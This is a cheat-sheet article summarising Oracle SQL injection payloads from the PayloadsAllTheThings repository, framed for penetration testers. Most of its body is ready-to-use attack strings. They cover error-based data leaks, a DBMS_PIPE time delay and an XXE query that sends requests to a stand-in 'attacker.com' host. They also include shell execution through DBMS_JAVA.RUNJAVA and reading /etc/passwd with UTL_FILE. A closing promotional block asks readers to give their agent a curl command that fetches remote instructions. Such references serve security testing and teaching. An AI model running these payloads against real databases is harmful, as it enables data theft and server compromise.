Oracle SQL Specific SQL Injection Payloads: Techniques and Cheat Sheet

The swisskyrepo/PayloadsAllTheThings repository maintains a comprehensive collection of Oracle SQL specific SQL injection payloads organized by technique, covering enumeration, error-based extraction, blind boolean tests, time-based delays, out-of-band exfiltration, remote command execution, and file manipulation vectors.

Penetration testers targeting Oracle databases require specialized syntax that differs significantly from MySQL or Microsoft SQL Server. The PayloadsAllTheThings repository centralizes these vectors in SQL Injection/OracleSQL Injection.md, providing exact payloads that leverage Oracle-specific system views, packages, and functions to extract data or execute commands.

Database Enumeration Techniques

Oracle exposes critical metadata through system views like v$version and all_users. Attackers use these to fingerprint the database and map the schema before exploitation.

Version and User Fingerprinting

Query the v$version view to identify the exact Oracle release and platform:

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';

List all database accounts accessible to the current session:

SELECT username FROM all_users;

Error-Based Data Extraction

Oracle error messages reveal query results when specific functions receive malformed input. The utl_inaddr.get_host_name function triggers DNS lookup errors that reflect subquery data, while dbms_xmlgen.getxml generates parsing errors containing concatenated results.

Use UTL_INADDR to leak the database banner through a DNS resolution error:

SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual;

Force an XML parsing error to extract the current user via DBMS_XMLGEN:

SELECT to_char(dbms_xmlgen.getxml('select "'||'|| (SELECT user FROM dual) ||'" FROM dual')) FROM dual;

Blind Boolean-Based Detection

When error messages are suppressed, attackers use conditional logic that returns true/false states based on data existence. This technique queries user_tab_cols to verify table and column names without direct output.

Test for the existence of a specific table and column combination:

SELECT COUNT(*) FROM user_tab_cols
WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';

A returned count greater than zero confirms the column exists, allowing binary search enumeration of schema metadata.

Time-Based Blind Injection

Oracle lacks a native sleep() function, but the DBMS_PIPE package provides reliable delay mechanisms. The RECEIVE_MESSAGE function waits for a pipe message that never arrives, creating a measurable pause.

Introduce a 10-second delay when a condition evaluates to true:

AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('DELAY',10) ELSE 1337 END);

This payload allows attackers to infer data bit-by-bit through response timing analysis when boolean indicators are unavailable.

Out-of-Band Data Exfiltration

XML External Entity (XXE) injection forces the Oracle parser to request remote resources, tunneling data via DNS or HTTP requests to attacker-controlled servers. This bypasses firewall restrictions on direct database connections.

Trigger an out-of-band request containing exfiltrated data:

SELECT EXTRACTVALUE(
  xmltype('<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.com/secret.txt"> %remote;]>'),
  '/l'
) FROM dual;

Operating System Command Execution

Oracle supports Java stored procedures and external procedure calls that enable shell command execution. The DBMS_JAVA package and custom os_command packages allow arbitrary code execution when the database user possesses requisite privileges.

Execute a system command via the Java wrapper class:

SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c "id > /tmp/pwn.txt"') FROM dual;

File Read and Write Operations

The UTL_FILE package provides native file system access for reading sensitive configuration files or writing web shells. These operations typically require stacked queries or PL/SQL blocks.

Read the first 100 lines of /etc/passwd using UTL_FILE:

SELECT utl_file.get_line(utl_file.fopen('/etc','passwd','R'), 100) FROM dual;

Summary

  • Enumeration relies on v$version and all_users views to map the database environment.
  • Error-based techniques use UTL_INADDR and DBMS_XMLGEN to leak data through forced error messages.
  • Blind detection employs conditional counts against user_tab_cols for inference-based extraction.
  • Time-based delays utilize DBMS_PIPE.RECEIVE_MESSAGE for reliable timing attacks.
  • Out-of-band exfiltration exploits XML external entities to smuggle data via HTTP/DNS.
  • Command execution leverages DBMS_JAVA or os_command packages for operating system access.
  • File manipulation uses UTL_FILE operations within stacked queries to read server files.

Frequently Asked Questions

What distinguishes Oracle SQL injection from other database platforms?

Oracle databases utilize proprietary system views (such as v$version and all_users) and specialized packages (including UTL_FILE and DBMS_PIPE) that require syntax distinct from MySQL or PostgreSQL. Payloads must account for Oracle's dual-table requirement (FROM dual) and specific error message formats.

How can I fingerprint an Oracle database through injection testing?

Query SELECT banner FROM v$version to obtain version strings, or trigger Oracle-specific functions like utl_inaddr.get_host_name that produce unique error codes (ORA-29257, ORA-00904) distinguishable from other database systems. The presence of the dual table in successful queries also confirms an Oracle backend.

Is remote command execution possible through Oracle SQL injection?

Yes, when the database user has Java privileges or access to the DBMS_SCHEDULER package, attackers can execute shell commands via DBMS_JAVA.RUNJAVA or external procedures. The repository documents payloads for both Java-based execution and the os_command package approach.

Which time-based method works best for blind Oracle injection?

DBMS_PIPE.RECEIVE_MESSAGE is the most reliable vector, accepting a string identifier and delay value in seconds. Unlike heavy computational queries that may vary in execution time, this function provides consistent, measurable delays for accurate boolean inference.

Have a question about this repo?

These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:

Share the following with your agent to get started:
curl -s "https://instagit.com/install.md"

Works with
Claude Codex Cursor VS Code OpenClaw Any MCP Client

Maintain an open-source project? Get it listed too →